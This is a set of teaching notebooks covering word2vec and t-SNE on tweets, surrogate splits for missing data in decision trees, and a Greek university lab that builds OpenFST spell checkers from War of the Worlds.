= df['tweet'].values ``` ## Train Embeddings Let's train our own embeddings. ``` #CBOW import time start = time.time() word2vec_tweet = Word2Vec(tweets,min_count=5, sg=0) end = time.time() print("CBOW Model Training Complete.\nTime taken for training is:{:.5f} sec ".format((end-start))) #Summarize the loaded model print("Summary of the model:",word2vec_tweet) #Summarize vocabulary words = list(word2vec_tweet.wv.vocab) print("Small part of Vocabulary of our model:",words[:10]) #Acess vector for one word print("Acess Vector for the word 'lol'",word2vec_tweet['lol']) from gensim.models import Word2Vec, KeyedVectors #To load the model import warnings warnings.filterwarnings('ignore') #ignore any generated warnings import numpy as np import matplotlib.pyplot as plt #to generate the t-SNE plot from sklearn.manifold import TSNE #scikit learn's TSNE #Preprocessing our models vocabulary to make better visualizations import nltk from nltk.corpus import stopwords nltk.download('stopwords') words_vocab= list(word2vec_tweet.wv.vocab)#all the words in the vocabulary. print("Size of Vocabulary:",len(words_vocab)) print("Few words in Vocabulary",words_vocab[:50]) #Let us remove the stop words from this it will help making the visualization cleaner stopwords_en = stopwords.words('english') words_vocab_without_sw = [word.lower() for word in words_vocab if not word in stopwords_en] print("Size of Vocabulary without stopwords:",len(words_vocab_without_sw)) print("Few words in Vocabulary without stopwords",words_vocab_without_sw[:30]) #The size didnt reduce much after removing the stop words so lets try visualizing only a selected subset of words #With the increase in the amount of data, it becomes more and more difficult to visualize and interpret #In practice, similar words are combined into groups for further visualization. keys = ['weekend','twitter','mcdonalds','coffee'] embedding_clusters = [] word_clusters = [] for word in keys: embeddings = [] words = [] for similar_word, _ in word2vec_tweet.most_similar(word, topn=10): words.append(similar_word) embeddings.append(word2vec_tweet[similar_word]) embedding_clusters.append(embeddings)#apending access vector of all similar words word_clusters.append(words)#appending list of all smiliar words print("Embedding clusters:",embedding_clusters[0][0])#Access vector of the first word only print("Word Clousters:",word_clusters[:2]) ``` ## Visualization We will visualize our embeddings using T-SNE. If you do not know aht T-SNE is or have forgotten please refer to Ch3 in the book. We will be using the T-SNE code previously introduced in a notebook from Ch3 which can be found [here](https://github.com/practical-nlp/practical-nlp/blob/master/Ch3/09_Visualizing_Embeddings_Using_TSNE.ipynb). ``` from sklearn.manifold import TSNE import numpy as np embedding_clusters = np.array(embedding_clusters) n, m, k = embedding_clusters.shape #geting the dimensions tsne_model_en_2d = TSNE(perplexity=10, n_components=2, init='pca', n_iter=1500, random_state=2020) embeddings_en_2d = np.array(tsne_model_en_2d.fit_transform(embedding_clusters.reshape(n * m, k))).reshape(n, m, 2) #reshaping it into 2d so we can visualize it from sklearn.manifold import TSNE import matplotlib.pyplot as plt import matplotlib.cm as cm import numpy as np %matplotlib inline #script for constructing two-dimensional graphics using Matplotlib def tsne_plot_similar_words(labels, embedding_clusters, word_clusters, a=0.7): plt.figure(figsize=(16, 9)) for label, embeddings, words in zip(labels, embedding_clusters, word_clusters): x = embeddings[:,0] y = embeddings[:,1] plt.scatter(x, y, alpha=a, label=label) for i, word in enumerate(words): plt.annotate(word, alpha=0.5, xy=(x[i], y[i]), xytext=(5, 2), textcoords='offset points', ha='right', va='bottom', size=8) plt.legend(loc=4) plt.grid(True) plt.show() tsne_plot_similar_words(words_vocab_without_sw, embeddings_en_2d, word_clusters) ```
github_jupyter
#### Handling missing attributes at training If only a small fraction of data points have missing attributes and the amount of data at hand is very large one might as well exclude such *deficient* data points during training. This however is wasteful and is often times a luxury one cannot afford. A common way of handling missing data during training is by simply computing impurities (GNI, entropy, etc.) at nodes using whatever information is available, i.e. by ignoring missing information. To illustrate, consider a toy dataset below with 5 data points and 3 features. Data point $x_1$ is missing feature $f_2$, $x_2$ is missing $f_1$ and $x_4$ is missing both $f_2$ and $f_3$. | | $f_1$| $f_2$| $f_3$| |--------|------|------|------| | $x_1$ | 12.23| | 0.32 | | $x_2$ | |78.22 | 0.77 | | $x_3$ | 10.45|61.22 | 0.52 | | $x_4$ | 8.89 | | | | $x_5$ | 9.66 | 32.2 | 1.62 | Now while computing split for feature $f_1$ all but data point $x_2$ will be used since $x_2$ is missing feature $f_2$. Similarly for $f_2$, $x_1$ and $x_4$ will be excluded. Of course the impurities will be computed with different number of samples for different features but this is better than discarding *deficient* data points altogether. Do you see why? #### Handling missing attributes at inference In this section we will see how use of surrogate splits will allow us to handle missing attributes during inference. Surrogate split acts as a proxy for the primary split in case the data point is missing attribute which the primary split uses for making decision. Suppose the primary split at some node $N$ uses feature $f_i$ to decide which way a data point goes down the tree (left or right subtree) and suppose we encounter a data point for which that feature $f_i$ is missing. What would we do in such a case? The way *CART*s handle such situation is by maintaining a series of surrogate or substitute splits. Such surrogate splits are ordered by how well they approximate the primary split, often know as **predictive association**. Splits are tried in order (first the primary and then surrogate with best predictive association with the primary and then surrogate with second best association and so on) and the first split for which the data point has value for is used. **Predictive association** is simply the number of samples sent to the right and to the left by both splits. The goal of surrogate split here is to approximate primary split as close as possible. In doing so the surrogate split might however choose a threshold which might not be the optimal threshold in terms of reduction in impurity for that feature. Also it isn't true that a new subtree is grown for each surrogate split. That would be computationally prohibitive since that would require growing exponential subtrees. Why? Nor it is that the surrogate splits are second best split, third best split and so on in term of impurity reduction. Surrogate splits simply route data roughly the same way as primary split but using different attributes and thresholds. Which also means surrogate splits might route few data points wrongly (to the right subtree instead of left and vice versa) compared to the primary split. To drive the concept home lets work through the following toy example$^{1}$: | | $f_1$ | $f_2$ | $f_3$ | y | |------------|------ |-------|-------|----------| | $x_1$ | 0 | 7 | 8 | $c_1$ | | $x_2$ | 1 | 8 | 9 | $c_1$ | | $x_3$ | 2 | 9 | 0 | $c_1$ | | $x_4$ | 4 | 1 | 1 | $c_1$ | | $x_5$ | 5 | 5 | 2 | $c_1$ | | $x_6$ | 3 | 3 | 3 | $c_2$ | | $x_7$ | 6 | 0 | 4 | $c_2$ | | $x_8$ | 7 | 4 | 5 | $c_2$ | | $x_9$ | 8 | 5 | 6 | $c_2$ | | $x_{10}$ | 9 | 6 | 7 | $c_2$ | Lets first order samples by attribute values: | | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | |------------|-------|-------|-------|-------|-------|-------|-------|-------|-------|-------| | $f_1$ | <font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | <font color='blue'>$x_3$</font> | <font color='green'>$x_6$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$ </font>| <font color='green'>$x_7$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> | <font color='green'>$x_{10}$</font>| | $f_2$ | <font color='green'>$x_7$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$</font> | <font color='blue'>$x_6$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> |<font color='green'>$x_{10}$</font>| <font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | <font color='blue'>$x_3$</font> | | $f_3$ | <font color='blue'>$x_3$</font> | <font color='blue'>$x_4$</font> | <font color='blue'>$x_5$ </font>| <font color='green'>$x_6$</font> | <font color='green'>$x_7$</font> | <font color='green'>$x_8$</font> | <font color='green'>$x_9$</font> | <font color='green'>$x_{10}$</font>| <font color='blue'><font color='blue'>$x_1$</font> | <font color='blue'>$x_2$</font> | It is obvious from above that $f_1 < 5.5$ provides best split of data in terms of impurity. Hence $f_1$ will be our primary split. Now among $f_2$ and $f_3$ which one forms a better surrogate split to $f_1 < 5.5$? As can be verified, $f_3 < 3.5$ is the best surrogate split. Why? (*Hint* : Go through each possible split for each attribute and find the split that best approximates the primary split) <img src='surrogate_split.svg' width="800"> How about error? How does generalization error evolve as a function of number of missing values in the data? (*Hint*: More the missing values more the use of surrogate splits during inference) Finally, can you guess which attribute is going to be picked as the best surrogate split based on correlation information between attributes? ##### References : [1] Examples and figure derived from *Chapter : 8.3.10 Missing attributes*, Pattern Classification, 2nd Edition : Richard O. Duda, Peter E. Hart, David G. Stork
github_jupyter
# 1η εργαστηριακή άσκηση: Εισαγωγή στις γλωσσικές αναπαραστάσεις <h2><center> Περιγραφή </center></h2> __Σκοπός__ αυτού του μέρους της 1ης εργαστηριακής άσκησης είναι να γίνει μια εισαγωγή σε διαφορετικές γλωσσικές αναπαραστάσεις και τη χρήση τους για γλωσσικά tasks. Στο πρώτο μέρος θα εμπλουτίσουμε τον ορθογράφο που φτιάξαμε στην προπαρασκευή με character level και word level unigram γλωσσικά μοντέλα. Στο δεύτερο μέρος θα κάνουμε μια εισαγωγή στις λεξικές αναπαραστάσεις bag-of-words και word2vec και θα τις χρησιμοποιήσουμε σε ένα απλό πρόβλημα ταξινόμησης. <h2><center> Μέρος 1: Ορθογράφος </h2></center> Αρχικά κατεβάζουμε το corpus που θα χρησιμοποιήσουμε. Θα ασχοληθούμε με το βιβλίο __War of the Worlds__ όπως και στην προπαρασκευή έτσι ώστε να μπορούμε να συγκρίνουμε τα αποτελέσματα πάνω στο ίδιο corpus. Με την παρακάτω εντολή, λοιπόν, το κατεβάζουμε από το project Gutenberg σε plain txt μορφή και το αποθηκεύουμε με το όνομα __War.txt__. ``` ! wget -c http://www.gutenberg.org/files/36/36-0.txt -O War.txt ``` ### Βήμα 10: Εξαγωγή στατιστικών Στο βήμα αυτό θα κατασκευάσουμε 2 πηγές στατιστικών για τα γλωσσικά μας μοντέλα, μία __word/token level__ και μία __character level__. Για το βήμα αυτό αλλά και για την συνέχεια της άσκησης θα χρειαστούμε ορισμένες συναρτήσεις που υλοποιήθηκαν στην προπαρασκευή και μας βοηθάνε στην επεξεργασία του corpus. Συγκεκριμένα έχουμε τις εξής συναρτήσεις (η περιγραφή της λειτουργίας τους βρίσκεται στην προπαρασκευή): __1. identity_preprocess:__ ``` # Gets a string as input and just returns the same string. def identity_preprocess(string_var): return string_var ``` __2. read_path:__ ``` # Reads a file tokenizing each line. def read_path(file_path, preprocess = identity_preprocess): # Initilize the list of processed lines processed_lines = [] # Open file to read mode with open(file_path, "r") as f: for line in f: # Omit spaces if not line.isspace(): processed_lines.extend(preprocess(line)) return processed_lines ``` __3. tokenize:__ ``` import string # Tokenize a sttring def tokenize(s): # Remove possible spaces from the start or the end of the string and # turn all letters lowercase. s = s.strip().lower() # Remove all punctuations, symbols and numbers from the string leaving # only lowercase alphabetical letters. s = "".join((char for char in s if char not in string.punctuation and not char.isdigit())) # Replace new line characters with spaces s = s.replace('\n',' ') # Split the string in every space resulting in a list of tokens res = s.split(" ") return res ``` __4. get_tokens:__ ``` # Get all separate tokens from a file. def get_tokens(file_path): tokens = read_path(file_path, tokenize) distinct_tokens = list(dict.fromkeys(tokens)) return distinct_tokens ``` __5. get_alphabet:__ ``` # Get the alphabet of a file given its tokens. def get_alphabet(tokens): alphabet = [] for token in tokens: alphabet.extend(list(token)) alphabet = list(dict.fromkeys(alphabet)) return alphabet ``` Τώρα, λοιπόν, που έχουμε ορίσει τις συναρτήσεις που χρειαζόμαστε από την προπαρασκευή μπορούμε να συνεχίσουμε κανονικά στο βήμα 10. __α) token level:__ Πρέπει να εξάγουμε την πιθανότητα εμφάνισης κάθε token (λέξης) του βιβλίου και να την αποθηκεύσουμε σε ένα λεξικό με __key το token και value την πιθανότητα εμφάνισής του__. __Διαδικασία: __ - Θα φτιάξουμε μία συνάρτηση η οποία θα δέχεται ως όρισμα το path του corpus και θα επιστρέφει το ζητούμενο λεξικό. Αρχικά, θα αποθηκεύει σε μία λίστα όλα τα tokens χρησιμοποιώντας την συνάρτηση get_tokens και θα αρχικοποιεί το λεξικό μας με αυτά τα tokens ως keys και με value ίσο με 0. Στη συνέχεια, για κάθε λέξη του corpus θα αυξάνουμε το αντίστοιχο value στο λεξικό μας. Έτσι αφού διαιρέσουμε και κάθε value με τον αριθμό όλων των λέξεων του βιβλίου (για να μετατραπεί σε μία πιθανότητα) θα έχουμε δημιουργήσει το ζητούμενο λεξικό. ``` def token_level(path): # Keys of the dictionary are all discrete tokens. keys = get_tokens(path) # Initialize the dictionary with the above keys and all values equal to 0. dict_token = dict.fromkeys(keys, 0) # Get a list with all the words containing in the corpus. words = read_path(path, tokenize) # For each word increase the value of the corresponding key. for word in words: dict_token[word] += 1 # Divide each value with the total number of words to get the probability of each key. dict_token = {k: v / len(words) for k, v in dict_token.items()} return dict_token ``` - Καλούμε την συνάρτηση που ορίσαμε παραπάνω και αποθηκεύουμε το λεξικό μας ως __dict_token__. ``` # Get the dictionary of the frequency of each token. dict_token = token_level("War.txt") ``` __β) character level:__ Εδώ πρέπει να εξάγουμε την πιθανότητα εμφάνισης κάθε χαρακτήρα του corpus και, αντίστοιχα με πριν, να την αποθηκεύσουμε σε ένα λεξικό με key τον χαρακτήρα και value την πιθανότητα εμφάνισής του. __Διαδικασία:__ - Αντίστοιχα λοιπόν παραπάνω θα φτιάξουμε μία παρόμοια συνάρτηση, η οποία αυτή τη φορά θα κάνει την ίδια διαδικασία για κάθε χαρακτήρα του corpus αντί για κάθε λέξη. Εδώ θα χρησιμοποιηθεί η συνάρτηση get_alphabet η οποία θα μας δώσει τα keys του λεξικού μας. Τα values θα υπολογιστούν διατρέχοντας μία φορά όλα το βιβλίο και αυξάνοντας κάθε φορά κατά 1 το value του που αντιστοιχεί στον χαρακτήρα που συναντάμε. Τέλος, πρέπει να διαιρέσουμε με όλους τους εμφανιζόμενους χαρακτήρες. ``` def character_level(path): # Keys of the dictionary are the alphabet of the corpus. keys = get_alphabet(get_tokens(path)) # Initialize the dictionary with the above keys and all values equal to 0. dict_character = dict.fromkeys(keys, 0) # Get a list with all the words containing in the corpus. words = read_path(path, tokenize) # Counter that will keep track of all the characters in the corpus. total = 0 # For each letter of each word increase the corresponding value. for word in words: for char in list(word): total += 1 dict_character[char] += 1 # Divide each value with the total number of characters to get the probability of each key. dict_character = {k: v / total for k, v in dict_character.items()} return dict_character ``` Καλούμε την συνάρτηση που ορίσαμε παραπάνω και αποθηκεύουμε το λεξικό μας ως __dict_character__. ``` dict_character = character_level("War.txt") ``` Ολοκληρώνοντας, λοιπόν, το βήμα 10 έχουμε δύο λεξικά που αποτελούν τις πηγές στατιστικών για τα γλωσσικά μας μοντέλα, ένα word/token level και ένα character level. ### Βήμα 11: Κατασκευή μετατροπέων FST Για τη δημιουργία του ορθογράφου θα χρησιμοποιήσουμε μετατροπείς βασισμένους στην απόσταση Levenshtein. Θα χρησιμοποιήσουμε 3 τύπους από edits κάθε ένα από τα οποία χαρακτηρίζεται από ένα κόστος. Έχουμε: - __εισαγωγές χαρακτήρων__ - __διαγραφές χαρακτήρων__ - __αντικαταστάσεις χαρακτήρων__ __α)__ Στο βήμα αυτό θα υπολογίσουμε την μέση τιμή των βαρών του word level μοντέλου που κατασκευάσαμε στο βήμα 10α, το οποίο θα αποτελεί το κόστος w των edits. Συγκεκριμένα, αφού έχουμε την πιθανότητα εμφάνισης κάθε λέξης, το βάρος της ορίζεται ως ο αρνητικός λογάριθμος της πιθανότητας εμφάνισής της, δηλαδή __w = -log(P)__. Υπολογίζοντας, λοιπόν, το βάρος κάθε λέξης και παίρνοντας την μέση τιμή όλων των βαρών έχουμε το κόστος w, το οποίο επειδή προκύπτει από το token level μοντέλο το ονομάζουμε __w_token__. ``` from math import log10 # Calculate weight of each word. token_weights = {k:(-log10(v)) for k,v in dict_token.items()} # Get the mean value of weigths. w_token = sum(token_weights.values()) / len(token_weights.values()) ``` __β)__ Στο βήμα αυτό θα κατασκευάσουμε τον μετατροπέα μας με μία κατάσταση που υλοποιεί την απόσταση Levenshtein αντιστοιχίζοντας: - Kάθε χαρακτήρα στον εαυτό του με βάρος 0 __(no edit)__. - Kάθε χαρακτήρα στο <epsilon\> (ε) με βάρος w __(deletion)__. - Tο <epsilon\> σε κάθε χαρακτήρα με βάρος w __(insertion)__. - Kάθε χαρακτήρα σε κάθε άλλο χαρακτήρα με βάρος w __(substitution)__. Όπως και στην προπαρασκευή θα ορίσουμε την συνάρτηση format_arc η οποία διαμορφώνει μία γραμμή του αρχείου περιγραφής του κάθε FST. Συγκεκριμένα δέχεται ως όρισμα τα __src__, __dest__, __ilabel__, __olabel__ και το __weight__ (με default τιμή το 0) και τα επιστρέφει στην κατάλληλη μορφή όπως αναφέρεται και εδώ http://www.openfst.org/twiki/bin/view/FST/FstQuickTour#CreatingFsts/. ``` def format_arc(src, dest, ilabel, olabel, weight=0): return (str(src) + " " + str(dest) + " " + str(ilabel) + " " + str(olabel) + " " + str(weight)) ``` Ακόμη, από την στιγμή που θα κατασκευάσουμε ορισμένα FSTs θα χρειαστούμε ένα αρχείο __chars.syms__ το οποίο θα αντιστοιχίζει κάθε χαρακτήρα του αλφαβήτου με έναν αύξοντα ακέραιο αριθμό. Η διαδικασία αυτή έγινε στο βήμα 4 της προπαρασκευής και περιλαμβάνει την συνάρτηση alphabet_to_int όπως βλέπουμε και παρακάτω: ``` def alphabet_to_int(alphabet): # Open file f = open("chars.syms", "w") # Match epsilon to 0 f.write("EPS" + 7*" " + str(0) + '\n') num = 21 for character in alphabet: # Match every other character to an increasing index f.write(character + 7*" " + str(num) + '\n') num += 1 f.close() alphabet_to_int(get_alphabet(get_tokens("War.txt"))) ``` Στη συνέχεια, διαμορφώνουμε το αρχείο περιγραφής του μετατροπεά μας σύμφωνα με τις παραπάνω αντιστοιχίσεις. Το αποτέλεσμα αποθηκεύεται στο αρχείο __transducer_token.fst__ (συμβολίζουμε το (ε) με "EPS"). ``` # Get alphabet of the corpus alphabet = get_alphabet(get_tokens("War.txt")) # Open file to write mode f = open("transducer_token.fst", "w") for letter in alphabet: # no edit f.write(format_arc(0, 0, letter, letter) + "\n") # deletion f.write(format_arc(0, 0, letter, "EPS", w_token) + "\n") # insertion f.write(format_arc(0, 0, "EPS", letter, w_token) + "\n") for i in range(len(alphabet)): for j in range(len(alphabet)): if i != j: # substitution f.write(format_arc(0, 0, alphabet[i], alphabet[j], w_token) + "\n") # Make initial state also final state f.write("0") # Close file f.close() ``` Αντίστοιχα με την προπαρασκευή τρέχουμε το παρακάτω shell command που κάνει compile τον μετατροπέα μας. Το binary αρχείο που προκύπτει με όνομα __transducer_token.fst__ είναι αυτό που θα χρησιμοποιήσουμε στις επόμενες λειτουργίες. ``` ! fstcompile --isymbols=chars.syms --osymbols=chars.syms transducer_token.fst transducer_token.fst ``` __γ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία χρησιμοποιώντας το unigram γλωσσικό μοντέλο του βήματος 10β. Θα υπολογίσουμε αρχικά το νέο κόστος των edit το οποίο ισούται με τη μέση τιμή των βαρών του character level μοντέλου και στη συνέχεια θα γράψουμε στο αρχείο __transducer_char.fst__ την περιγραφή του μετατροπέα που θα χρησιμοποιεί το μοντέλο αυτό. ``` # Calculate weight of each character. character_weigths = {k: (-log10(v)) for k,v in dict_character.items()} # Get the mean value of weigths. w_char = sum(character_weigths.values()) / len(character_weigths.values()) # Open file to write mode f = open("transducer_char.fst", "w") for letter in alphabet: # no edit f.write(format_arc(0, 0, letter, letter) + "\n") # deletion f.write(format_arc(0, 0, letter, "EPS", w_char) + "\n") # insertion f.write(format_arc(0, 0, "EPS", letter, w_char) + "\n") for i in range(len(alphabet)): for j in range(len(alphabet)): if i != j: # substitution f.write(format_arc(0, 0, alphabet[i], alphabet[j], w_char) + "\n") # Make initial state also final state f.write("0") # Close file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms transducer_char.fst transducer_char.fst ``` __δ)__ Αυτός είναι ένας αρκετά αφελής τρόπος για τον υπολογισμό των βαρών για κάθε edit. Αν τώρα είχαμε στη διάθεση μας ό,τι δεδομένα θέλουμε αυτό που θα κάναμε είναι ότι θα υπολογίζαμε τα βάρη με βάση το πόσο συχνά γίνεται αυτό το λάθος. Πιο συγκεκριμένα, θα υπολογίζαμε για κάθε σύμβολο του αλφαβήτου την πιθανότητα κάποιος να το διαγράψει, να το προσθέσει ή να το αντικαταστήσει με κάποιο άλλο. Στη συνέχεια, θα μετατρέπαμε αυτές τις πιθανότητες σε κόστη παίρνοντας τον αρνητικό λογάριθμο και θα είχαμε τα τελικά βάρη μας για κάθε σύμβολο στο deletion και το insertion και για κάθε δυάδα συμβόλων στο substitution. Ο υπολογισμός αυτός μπορεί να γίνει σε περίπτωση που είχουμε το ίδιο corpus αλλά με λάθη για να μπορούμε να βρούμε πολύ απλά τις μετρικές που θέλουμε. ### Βήμα 12: Κατασκευή γλωσσικών μοντέλων __α)__ Στο βήμα αυτό θα κατασκευάσουμε έναν αποδοχέα με μία αρχική κατάσταση που θα αποδέχεται κάθε λέξη του λεξικού όπως αυτό ορίστηκε στην προπαρασκευή του εργαστηρίου στο βήμα 3α. Τώρα, όμως, ως βάρη θα χρησιμοποιήσουμε τον αρνητικό λογάριθμο της πιθανότητας εμφάνισης κάθε λέξης __-logP(w)__. Πρέπει το κόστος αυτό να κατανεμηθεί κάπως στην λέξη έτσι ώστε όλη η λέξη συνολικά να έχει το παραπάνω κόστος. Για λόγους βελτιστοποίησης και απλότητας προφανώς συμφέρει να βάλουμε όλο το κόστος της λέξης μόνο στην πρώτη ακμή της και τις υπόλοιπες να τις θέσουμε 0. Το αρχείο περιγραφής του αποδοχέα αποθηκεύεται ως __acceptor_token.fst__. ``` # Get tokens of the corpus (our acceptor should accept only these words) tokens = get_tokens("War.txt") # Open file to write mode f = open("acceptor_token.fst", "w") s = 1 for token in tokens: cost = token_weights[token] letters = list(token) for i in range(0, len(letters)): if i == 0: # For each token make state 1 its first state f.write(format_arc(1, s+1, letters[i], letters[i], cost) + "\n") else: f.write(format_arc(s, s+1, letters[i], letters[i]) + "\n") s += 1 if i == len(letters) - 1: # When reaching the end of a token go to final state 0 though an ε-transition f.write(format_arc(s, 0, "EPS", "EPS") + "\n") # Make state 0 final state f.write("0") # Close the file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms acceptor_token.fst acceptor_token.fst ``` __β)__ Στη συνέχεια καλούμε τις συναρτήσεις fstrmepsilon, fstdeterminize και fstminimize για να βελτιστοποιήσουμε το μοντέλο μας (η λειτουργία τους έχει αναφερθεί στην προπαρασκευή). ``` ! fstrmepsilon acceptor_token.fst acceptor_token.fst ! fstdeterminize acceptor_token.fst acceptor_token.fst ! fstminimize acceptor_token.fst acceptor_token.fst ``` __γ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία για το character level γλωσσικό μοντέλο. Αυτό που θα αλλάξει δηλαδή είναι ότι αντί να τοποθετούμε στην πρώτη ακμή της λέξης το κόστος ολόκληρης της λέξης θα ορίζουμε για την μετάβαση σε κάθε γράμμα της λέξης το αντίστοιχο κόστος του. Σημειώνεται ότι αντίστοιχα με πριν το κόστος ενός χαρακτήρα ισούται με τον αρνητικό λογάριθμο της πιθανότητας εμφάνισής του. Το αρχείο περιγραφής του αποδοχέα αποθηκεύεται ως __acceptor_char.fst__. ``` # Get tokens of the corpus (our acceptor should accept only these words) tokens = get_tokens("War.txt") # Open file to write mode f = open("acceptor_char.fst", "w") s = 1 for token in tokens: letters = list(token) for i in range(0, len(letters)): if i == 0: # For each token make state 1 its first state f.write(format_arc(1, s+1, letters[i], letters[i], character_weigths[letters[i]]) + "\n") else: f.write(format_arc(s, s+1, letters[i], letters[i], character_weigths[letters[i]]) + "\n") s += 1 if i == len(letters) - 1: # When reaching the end of a token go to final state 0 though an ε-transition f.write(format_arc(s, 0, "EPS", "EPS") + "\n") # Make state 0 final state f.write("0") # Close the file f.close() ! fstcompile --isymbols=chars.syms --osymbols=chars.syms acceptor_char.fst acceptor_char.fst ! fstrmepsilon acceptor_char.fst acceptor_char.fst ! fstdeterminize acceptor_char.fst acceptor_char.fst ! fstminimize acceptor_char.fst acceptor_char.fst ``` ### Βήμα 13: Κατασκευή ορθογράφων Στο βήμα αυτό θα κατασκευάσουμε δύο ορθογράφους χρησιμοποιώντας τα FST από τα παραπάνω βήματα. Η διαδικασία για κάθε έναν ορθογράφο θα είναι ίδια με αυτή που ακολουθήθηκε στο βήμα 7 της προπαρασκευής. __α)__ Ο πρώτος ορθογράφος που θα κατασκευάσουμε θα προκύψει συνθέτοντας τον word level transducer με το word level γλωσσικό μοντέλο. Αρχικά θα ταξινομήσουμε τις εξόδους του transducer_token και τις εισόδους του acceptor_token με την συνάρτηση __fstarcsort__. ``` ! fstarcsort --sort_type=olabel transducer_token.fst transducer_token.fst ! fstarcsort --sort_type=ilabel acceptor_token.fst acceptor_token.fst ``` Στη συνέχεια συνθέτουμε τον transducer_token με τον acceptor_token με την συνάρτηση fstcompose αποθηκεύοντας τον spell checker μας στο αρχείο __spell_checker1.fst__. ``` ! fstcompose transducer_token.fst acceptor_token.fst spell_checker1.fst ``` __β)__ Ο δεύτερος ορθογράφος θα προκύψει συνθέτοντας τον word level tranducer με το unigram γλωσσικό μοντέλο. Αρχικά θα ταξινομήσουμε τις εισόδους του acceptor_char με την συνάρτηση __fstarcsort__. ``` ! fstarcsort --sort_type=ilabel acceptor_char.fst acceptor_char.fst ``` Στη συνέχεια συνθέτουμε τον transducer_token με τον acceptor_char με την συνάρτηση fstcompose αποθηκεύοντας τον spell checker μας στο αρχείο __spell_checker2.fst__. ``` ! fstcompose transducer_token.fst acceptor_char.fst spell_checker2.fst ``` __γ)__ Η διαφορά των δύο ορθογράφων βρίσκεται στο γλωσσικό μοντέλο που χρησιμοποιούν. Συγκεκριμένα: 1. __Word-Level μοντέλο:__ Ο 1ος ορθογράφος για να διορθώσει μία λέξη κοιτάει (πέρα από τον αριθμό των edits) την συχνότητα εμφάνισης της κάθε λέξης στο corpus. Έτσι, διορθώνει μία λέξη σε μία άλλη που είναι πιο πιθανό να είχε εμφανιστεί. 2. __Unigram μοντέλο:__ Ο 2ος ορθογράφος για να διορθώσει μία λέξη κοιτάει (πέρα από τον αριθμό των edits) την συχνότητα εμφάνισης κάθε γράμματος της διορθωμένης λέξης. Έτσι, διορθώνει μία λέξη αλλάζοντας κάθε γράμμα της στο πιο πιθανό που ήταν να εμφανιστεί. Για παράδειγμα έστω ότι έχουμε την λέξη __cit__ και οι δύο πιθανές λέξεις που βρίσκονται στο λεξικό μας και έχουν μόνο 1 αλλαγή είναι η __cat__ και η __cut__. Ο 1ος ορθογράφος πιθανώς να επιλέξει την cut επειδή είναι μία πιο συνιθισμένη λέξη. Από την άλλη, ο 2ο ορθογράφος μπορεί να επιλέξει την cat επειδή το γράμμα a εμφανίζεται πιο συχνά από το γράμμα u. Ένα αντίστοιχο παράδειγμα παρουσιάζεται στο τέλος του επόμενου βήματος όπου δίνουμε την λέξη qet στους δύο ορθογράφους. ### Βήμα 14: Αξιολόγηση των ορθογράφων __α)__ Για να κάνουμε το evaluation των δύο ορθογράφων κατεβάζουμε το παρακάτω σύνολο δεδομένων: ``` ! wget https://raw.githubusercontent.com/georgepar/python-lab/master/spell_checker_test_set ``` __β)__ Δημιουργούμε αρχικά μία συνάρτηση __predict__ η οποία δέχεται μία λέξη που πρέπει να διορθωθεί και γράφει σε ένα αρχείο __pred_word.fst__ την περιγραφή ενός FST το οποίο αποδέχεται την συγκεκριμένη λέξη. Το FST αυτό θα το κάνουμε στη συνέχεια compose με τον ορθογράφο για να πάρουμε το τελικό αποτέλεσμα. ``` def predict(word): s= 1 letters = list(word) # Open file to write mode f = open("pred_word.fst", "w") for i in range(0, len(letters)): # For each letter of the word make a transition with zero weight f.write(format_arc(s, s+1, letters[i], letters[i], 0) + '\n') s += 1 if i == len(letters) - 1: # When reaching the end the word make a ε-transition to the final state 0 f.write(format_arc(s, 0, "EPS", "EPS", 0) + '\n') # Final state f.write("0") # Close the file f.close() ``` Είμαστε έτοιμοι, λοιπόν, τώρα να αξιολογήσουμε τους δύο ορθογράφους. Θα επιλέξουμε 10 τυχαίες λέξεις από το evaluation set που κατεβάσαμε και θα τις διορθώσουμε χρησιμοποιώντας τους 2 ορθογράφους μας. ``` import random random.seed(1) test_words = [] for _ in range(10): random_lines = random.choice(open('spell_checker_test_set').readlines()) test_words.append(random.choice(random_lines.strip('\n').split()[1:])) for word in test_words: print(word + ":" + " ",end='') predict(word) print("1: ",end='') ! ./predict.sh spell_checker1.fst print(" 2: ",end='') ! ./predict.sh spell_checker2.fst print('\n') ``` __γ)__ Παρατηρούμε ότι έχουν μία αρκετά καλή επίδοση οι δύο ορθογράφοι μας η οποία αυξάνοντας το corpus (το οποίο είναι μόνο ένα βιβλίο) θα μπορούσαν να γίνουν ακόμα καλύτεροι. Συγκεκριμένα: - Ο 1ος ορθογράφος κατασκευάστηκε συνθέτοντας το word-level γλωσσικό μοντέλο με το word-level μετατροπέα. Αυτό σημαίνει, ότι ο ορθογράφος προσπαθεί να διορθώσει μία λέξη όχι μόνο λαμβάνοντας υπόψιν τις λιγότερες αλλαγές (όπως στην προπαρασκευή) αλλά και το πόσο πιθανή είναι η λέξη στην οποία θα μετατραπεί. Αυτό αυξάνει την επίδοσή του γιατί προφανώς όσο πιο πιθανή είναι μία λέξη τόσο και πιο πιθανό είναι να έχει γραφτεί λάθος. Ο μετατροπέας, τώρα, έγινε word-level έτσι ώστε να φέρουμε τα βάρη των edits στην ίδια τάξη μεγέθους με τα βάρη του γλωσσικού μοντέλου. - Ο 2ος ορθογράφος κατασκευάστηκε συνθέτοντας το unigram γλωσσικό μοντέλο με το word-level μετατροπέα. Αυτό σημαίνει ότι ο ορθογράφος προσπαθεί να διορθώσει μία λέξη λαμβάνοντας υπόψιν αυτή τη φορά πόσο πιθανό είναι το γράμμα το οποίο θέλει να διορθώσει. Αυτό το γλωσσικό μοντέλο επίσης αυξάνει την απόδοση γιατί όσο πιο πιθανό είναι ένα γράμμα τόσο και πιο πιθανό είναι να έχει γραφτεί λάθος το συγκεκριμένο γράμμα. Τα βάρη του μετατροπέα τώρα κάνουν την ίδια δουλειά που αναφέρθηκε και παραπάνω. Για να κατανοήσουμε καλύτερα την διαφορετική λειτουργία 